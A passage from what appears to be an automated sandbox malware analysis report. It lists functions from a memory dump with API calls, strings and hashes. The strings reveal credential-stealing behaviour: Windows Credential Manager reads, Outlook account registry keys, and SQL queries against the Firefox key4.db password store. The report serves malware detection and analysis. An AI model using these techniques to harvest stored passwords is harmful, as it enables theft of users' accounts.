                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040FA0B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040FA1C
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0040FA3C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                          • API String ID: 2449869053-232097475
                                                                                                                                                                                          • Opcode ID: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
                                                                                                                                                                                          • Instruction ID: b0622ab91b6b15bab8cd8e6e0f6310f6235a52dd738245c008a901a401bb443a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
                                                                                                                                                                                          • Instruction Fuzzy Hash: C6017574A41315ABDB31DB256D41F6B2DE49786B41B100037F808F16A5E7B8D806CF6D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403E83 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 98COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                          • memset.MSVCRT ref: 00403EBB
                                                                                                                                                                                          • memset.MSVCRT ref: 00403ECF
                                                                                                                                                                                          • memset.MSVCRT ref: 00403EE3
                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403F04
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00403F20
                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403F57
                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403F88
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F82
                                                                                                                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403EFE
                                                                                                                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E93
                                                                                                                                                                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F32
                                                                                                                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00403F1A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                          • API String ID: 113626815-1670831295
                                                                                                                                                                                          • Opcode ID: e988a86f96cb0b35651706e8a54da2f8db7d6407d8c8c481c34fbc63b9ba1f92
                                                                                                                                                                                          • Instruction ID: 806bb3af6c01162091129d7dbd14bcfdd9389eda619bfd821539a1a2e53cd61a
                                                                                                                                                                                          • Opcode Fuzzy Hash: e988a86f96cb0b35651706e8a54da2f8db7d6407d8c8c481c34fbc63b9ba1f92
                                                                                                                                                                                          • Instruction Fuzzy Hash: 553187B2944218BAEB10EB95CC41FDF77ACEB44305F1040ABF609A3141DE789F988B69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004092CB Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • sprintf.MSVCRT ref: 004092EC
                                                                                                                                                                                          • LoadMenuA.USER32(?,?), ref: 004092FA
                                                                                                                                                                                            • Part of subcall function 00409123: GetMenuItemCount.USER32(?), ref: 00409138
                                                                                                                                                                                            • Part of subcall function 00409123: memset.MSVCRT ref: 00409159
                                                                                                                                                                                            • Part of subcall function 00409123: GetMenuItemInfoA.USER32 ref: 00409194
                                                                                                                                                                                            • Part of subcall function 00409123: strchr.MSVCRT ref: 004091AB
                                                                                                                                                                                          • DestroyMenu.USER32(00000000), ref: 00409318
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040935C
                                                                                                                                                                                          • CreateDialogParamA.USER32(?,00000000,00000000,004092C6,00000000), ref: 00409371
                                                                                                                                                                                          • memset.MSVCRT ref: 0040938D
                                                                                                                                                                                          • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040939E
                                                                                                                                                                                          • EnumChildWindows.USER32(00000000,Function_00009213,00000000), ref: 004093C6
                                                                                                                                                                                          • DestroyWindow.USER32(00000000), ref: 004093CD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                          • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                          • API String ID: 3259144588-3822380221
                                                                                                                                                                                          • Opcode ID: 00d5c196fd175f8f7b493892d5fd0a4de6fbafe6eb8e7d8c787b31c60a4e7b89
                                                                                                                                                                                          • Instruction ID: 4880027b7f24484a0daf4b70c4ca19663393d93293db39a52c89ae2e2b3c84be
                                                                                                                                                                                          • Opcode Fuzzy Hash: 00d5c196fd175f8f7b493892d5fd0a4de6fbafe6eb8e7d8c787b31c60a4e7b89
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0121E472500248BBEB21AF509C45EEF3768FB4A715F14007BFE01A11D2D6B85D548F59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040F928 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F798), ref: 0040F937
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040F950
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040F961
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040F972
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040F983
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040F994
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                          • API String ID: 667068680-3953557276
                                                                                                                                                                                          • Opcode ID: f969084aaa60d6fc347aca6cd4b103efb280d70b1424ed757b2f63fa67c010da
                                                                                                                                                                                          • Instruction ID: d70ca51da7794723d6fdd3b52e2ca510f6325bc6d96353a7ae51ff6a4d6706bc
                                                                                                                                                                                          • Opcode Fuzzy Hash: f969084aaa60d6fc347aca6cd4b103efb280d70b1424ed757b2f63fa67c010da
                                                                                                                                                                                          • Instruction Fuzzy Hash: E5F03674641716BEE7219B35EC41F6B2DA8B786B817150037E404F1295EBBCD406CBEE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004045D6 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00404651: FreeLibrary.KERNEL32(?,004045DE,?,0040F07D,?,00000000), ref: 00404658
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                          • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                          • API String ID: 2449869053-4258758744
                                                                                                                                                                                          • Opcode ID: cdcbb80234758e29e10a2fa45a01471a6c512abbbeef489e8d79757fa0f5749b
                                                                                                                                                                                          • Instruction ID: e667573ab02a3a36113e5811d7d9d25958220871e4fc9ad39742c7b975dc30ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: cdcbb80234758e29e10a2fa45a01471a6c512abbbeef489e8d79757fa0f5749b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 32012CB49007009ADB30AF759809B46BAE0EF9A705B224C2FE295A3691E77ED440CF49
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040F177 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 118registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F1BF
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F1EC
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F215
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F28E
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 0040F2A1
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2AC
                                                                                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                          • String ID: Creds$ps:password
                                                                                                                                                                                          • API String ID: 551151806-1872227768
                                                                                                                                                                                          • Opcode ID: 99828ca7f35a41181d9bb96a9a02e43887c925b3765608a693f25377290640c0
                                                                                                                                                                                          • Instruction ID: 6090246ec9a09cf2b7bf1ee2c59d5b558b26d9adbf6fbfd3eb8a6f02fd62f1f0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 99828ca7f35a41181d9bb96a9a02e43887c925b3765608a693f25377290640c0
                                                                                                                                                                                          • Instruction Fuzzy Hash: D7413ABA900209AFDF21DF95DC44EEFBBBCEF49704F0000B6F905E2151DA349A548B64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404217 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wcsstr.MSVCRT ref: 0040424C
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404293
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042A7
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004042B7
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004042CA
                                                                                                                                                                                          • strchr.MSVCRT ref: 004042D8
                                                                                                                                                                                          • strlen.MSVCRT ref: 004042EC
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040430D
                                                                                                                                                                                          • strchr.MSVCRT ref: 0040431E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                          • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                          • API String ID: 3866421160-4070641962
                                                                                                                                                                                          • Opcode ID: 1db7f9bf2b70e86dd11ed3dbd874db975a9752dd457c4b53029e5acecafbc8af
                                                                                                                                                                                          • Instruction ID: 638e790b5603b8fd8804fb5d4b15941c8435a10b684d18614d662d2844f21a3d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1db7f9bf2b70e86dd11ed3dbd874db975a9752dd457c4b53029e5acecafbc8af
                                                                                                                                                                                          • Instruction Fuzzy Hash: A53195B290421CBFEB11DB91DC81FDAB36CEB44314F1005A7F708F2181DA78AF558A59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004094A2 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004094BA
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004094CA
                                                                                                                                                                                            • Part of subcall function 0040907D: memset.MSVCRT ref: 004090A2
                                                                                                                                                                                            • Part of subcall function 0040907D: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,?,00001000,00451200), ref: 004090C6
                                                                                                                                                                                            • Part of subcall function 0040907D: WritePrivateProfileStringA.KERNEL32(00451308,?,?,00451200), ref: 004090DD
                                                                                                                                                                                          • EnumResourceNamesA.KERNEL32(?,00000004,Function_000092CB,00000000), ref: 00409500
                                                                                                                                                                                          • EnumResourceNamesA.KERNEL32(?,00000005,Function_000092CB,00000000), ref: 0040950A
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00409512
                                                                                                                                                                                          • memset.MSVCRT ref: 0040952E
                                                                                                                                                                                          • LoadStringA.USER32(?,00000000,?,00001000), ref: 00409542
                                                                                                                                                                                            • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                          • API String ID: 1035899707-3647959541
                                                                                                                                                                                          • Opcode ID: 97e9d8764d44d496b522761866ccd9ae9dc7e38aa88f3c298a62bf6b22ba0dc4
                                                                                                                                                                                          • Instruction ID: 9dc8dfcbefe26b31ead3ecdd6c1d49ac828ce4ba7b4c08f8d1d1c72bb5e2ee9a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 97e9d8764d44d496b522761866ccd9ae9dc7e38aa88f3c298a62bf6b22ba0dc4
                                                                                                                                                                                          • Instruction Fuzzy Hash: A6112B7190025476F73127169C06FDB3E5CDF86B96F00407BBB08B61D3C6B94D40866D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004106AD Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscpy
                                                                                                                                                                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                          • API String ID: 714388716-318151290
                                                                                                                                                                                          • Opcode ID: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
                                                                                                                                                                                          • Instruction ID: 9896847eb90bf5c4294a3c9dccddd80cbc36a64f1d49de08ffe9e6d9729d10b2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CF054B1BA870D60343C0528088EAF715009463B453764627F222E05DECEEDBCD26C0F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040C750 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 0040C7C9
                                                                                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 0040C7D7
                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0040C7EC
                                                                                                                                                                                          • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C821
                                                                                                                                                                                          • SelectObject.GDI32(00000014,?), ref: 0040C82D
                                                                                                                                                                                            • Part of subcall function 0040C586: GetCursorPos.USER32(?), ref: 0040C593
                                                                                                                                                                                            • Part of subcall function 0040C586: GetSubMenu.USER32(?,00000000), ref: 0040C5A1
                                                                                                                                                                                            • Part of subcall function 0040C586: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C5CE
                                                                                                                                                                                          • LoadCursorA.USER32(00000067), ref: 0040C84E
                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 0040C855
                                                                                                                                                                                          • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040C877
                                                                                                                                                                                          • SetFocus.USER32(?), ref: 0040C8B2
                                                                                                                                                                                          • SetFocus.USER32(?), ref: 0040C92B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1416211542-0
                                                                                                                                                                                          • Opcode ID: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
                                                                                                                                                                                          • Instruction ID: 09ccc7060a79f4adaf8e2edad657e89b5ff3622033c15eab8e38028839dfd0e9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E518276200605EFCB15AF64CCC5AAA77A5FB08302F004636F616B72A1CB39A951DB9D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040DEF0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                          • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                          • API String ID: 2360744853-2229823034
                                                                                                                                                                                          • Opcode ID: 6cd9f616e22569c22ee97f1c282593b0608afcf1e5c6b77fef8cec6df374adea
                                                                                                                                                                                          • Instruction ID: 5d143ff0da15214bab7bb06cf5d8f907292877c2fd7590e182fa264530f008e8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cd9f616e22569c22ee97f1c282593b0608afcf1e5c6b77fef8cec6df374adea
                                                                                                                                                                                          • Instruction Fuzzy Hash: 934185726053059FE724DEA5C881F9673E8EF04304F10497BF64AE3281DB78F9588B59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402C4F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                          • memset.MSVCRT ref: 00402C8F
                                                                                                                                                                                            • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402D91
                                                                                                                                                                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                          • memset.MSVCRT ref: 00402CE9
                                                                                                                                                                                          • sprintf.MSVCRT ref: 00402D02
                                                                                                                                                                                          • sprintf.MSVCRT ref: 00402D40
                                                                                                                                                                                            • Part of subcall function 00402BC3: memset.MSVCRT ref: 00402BE3
                                                                                                                                                                                            • Part of subcall function 00402BC3: RegCloseKey.ADVAPI32 ref: 00402C47
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                          • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                                          • API String ID: 1831126014-3814494228
                                                                                                                                                                                          • Opcode ID: 68836d752764ed395c939e698c27d7ced96b5c8b84be7de8b5e82d7aea7963ed
                                                                                                                                                                                          • Instruction ID: 1b5601e0499ef747dd56af052f35eddfd4da5329eef37c5f4f36e35d9cf9c12c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 68836d752764ed395c939e698c27d7ced96b5c8b84be7de8b5e82d7aea7963ed
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0831507290011CBAEF11EA91CC46FEF777CAF04305F0404BABA04B2192E7B59F948B64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040FA44 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strchr.MSVCRT ref: 0040FA5C
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040FA6A
                                                                                                                                                                                            • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075DD
                                                                                                                                                                                            • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075E5
                                                                                                                                                                                            • Part of subcall function 004075CB: _memicmp.MSVCRT ref: 00407603
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040FABA
                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040FAC5
                                                                                                                                                                                          • memset.MSVCRT ref: 0040FAA1
                                                                                                                                                                                            • Part of subcall function 00406EF9: GetWindowsDirectoryA.KERNEL32(004517B0,00000104,?,0040FAFA,00000000,?,00000000,00000104,00000104), ref: 00406F0E
                                                                                                                                                                                            • Part of subcall function 00406EF9: _mbscpy.MSVCRT ref: 00406F1E
                                                                                                                                                                                          • memset.MSVCRT ref: 0040FAE9
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040FB04
                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040FB0F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                          • String ID: \systemroot
                                                                                                                                                                                          • API String ID: 912701516-1821301763
                                                                                                                                                                                          • Opcode ID: 9693690fb4489c5de0eab49cfe3cb56840eb7b64a83fc31564cd0bab15c85152
                                                                                                                                                                                          • Instruction ID: 2dd3a797b17f22995e4c1cf65abf5f7fbb47152c003677c6e5f404f17f2ef451
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9693690fb4489c5de0eab49cfe3cb56840eb7b64a83fc31564cd0bab15c85152
                                                                                                                                                                                          • Instruction Fuzzy Hash: 92210A7550C20469F734E2618C82FEB76EC9B55708F10007FF289E14C1EEBCA9884A6A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406625 Relevance: 16.7, APIs: 7, Strings: 4, Instructions: 205COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • key4.db, xrefs: 00406632
                                                                                                                                                                                          • SELECT a11,a102 FROM nssPrivate, xrefs: 0040677A
                                                                                                                                                                                          • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 0040668D
                                                                                                                                                                                          • C@, xrefs: 00406625
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
